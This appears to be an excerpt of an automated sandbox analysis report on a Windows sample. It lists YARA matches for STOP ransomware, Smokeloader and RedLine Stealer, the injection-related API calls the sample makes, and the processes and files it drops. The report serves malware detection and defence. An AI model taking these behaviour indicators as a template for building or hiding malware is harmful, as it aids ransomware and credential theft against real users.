                Source: 8.0.6246.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000005.00000002.574920168.0000000000741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000009.00000000.491916459.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000006.00000002.517310992.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000007.00000000.492089857.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000006.00000002.505319031.0000000000841000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000008.00000000.496174295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000007.00000002.531881974.0000000000921000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000009.00000000.499526693.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000004.00000002.533353582.0000000000926000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000004.00000002.535198991.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000005.00000002.572802544.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000006.00000002.503555817.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000002.431462831.00000000008C1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000009.00000002.533230788.0000000000661000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000005.00000002.572996801.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000009.00000002.532778418.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000000.00000002.426191617.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000009.00000000.500012370.0000000000661000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000005.00000002.575526582.0000000000851000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000007.00000002.531437946.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 0000000E.00000000.490370694.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000007.00000000.494940938.0000000000921000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000007.00000000.499882815.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000002.425983176.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000009.00000000.493912114.0000000000661000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000000.00000002.426259430.0000000000741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000008.00000000.524094887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 00000008.00000000.524094887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 00000008.00000000.524094887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000007.00000000.500354218.0000000000921000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000001.00000000.410751234.0000000005261000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000006.00000002.511843457.00000000021D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000008.00000000.506719194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 00000008.00000000.506719194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 00000008.00000000.506719194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000008.00000000.520562150.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 00000008.00000000.520562150.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 00000008.00000000.520562150.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 6246.exe PID: 5608, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 6246.exe PID: 1420, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: String function: 0040EAC8 appears 37 times
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: String function: 004097B4 appears 33 times
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0040EAB8 appears 38 times
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402241 NtQuerySystemInformation,
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040224D NtQuerySystemInformation,
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402251 NtQuerySystemInformation,
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402219 NtQuerySystemInformation,
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040221B NtQuerySystemInformation,
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401727 NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401581 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401584 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401587 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D7E5 __crt_waiting_on_module_handle,NtQuerySystemInformation,RtlEncodePointer,
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040C09D __setlocale_set_cat,NtQuerySystemInformation,_strpbrk,_strncmp,_strlen,_strcspn,__invoke_watson,__setlocale_set_cat,__expandlocale,__setlocale_set_cat,__setlocale_get_all,
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D94C __crt_waiting_on_module_handle,NtQuerySystemInformation,__lock,__lock,___addlocaleref,
                Source: file.exeStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\thduhcfJump to behavior
                Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@24/24@23/11
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_00404AE9 SetLastError,GetTickCount,GetLogicalDriveStringsW,LocalAlloc,UnregisterWait,GetNamedPipeHandleStateW,InterlockedIncrement,GetPrivateProfileStructA,GetConsoleAliasExesLengthW,EnumCalendarInfoA,EnumDateFormatsW,InterlockedCompareExchange,DeleteFiber,GetPrivateProfileStructA,LeaveCriticalSection,InterlockedExchange,RtlCaptureContext,FindResourceA,LocalFlags,OpenMutexA,GetStringTypeExA,GetComputerNameA,InitializeCriticalSection,LoadLibraryW,GetModuleHandleA,GetProcAddress,InterlockedDecrement,InterlockedDecrement,GetCurrentConsoleFont,GlobalFlags,FindNextVolumeA,GetConsoleFontSize,CreateJobObjectA,GetModuleHandleW,FormatMessageW,CreateActCtxA,GetConsoleTitleA,GetCalendarInfoA,VerifyVersionInfoW,FindFirstChangeNotificationA,InterlockedIncrement,InterlockedDecrement,GetCommandLineA,SearchPathA,WriteConsoleOutputA,GetProfileSectionA,MoveFileWithProgressA,GetCommandLineW,WriteConsoleA,lstrcpynW,CopyFileA,LoadLibraryA,MoveFileWithProgressW,CreateIoCompletionPort,GetOEMCP,InterlockedExchange,GetPrivateProfileStructA,DeleteVolumeMountPointA,GetConsoleAliasesLengthA,GetFileTime,GetStringTypeW,
                Source: file.exeVirustotal: Detection: 38%
                Source: file.exeReversingLabs: Detection: 43%
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6246.exe C:\Users\user\AppData\Local\Temp\6246.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\thduhcf C:\Users\user\AppData\Roaming\thduhcf
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\69A9.exe C:\Users\user\AppData\Local\Temp\69A9.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\7795.exe C:\Users\user\AppData\Local\Temp\7795.exe
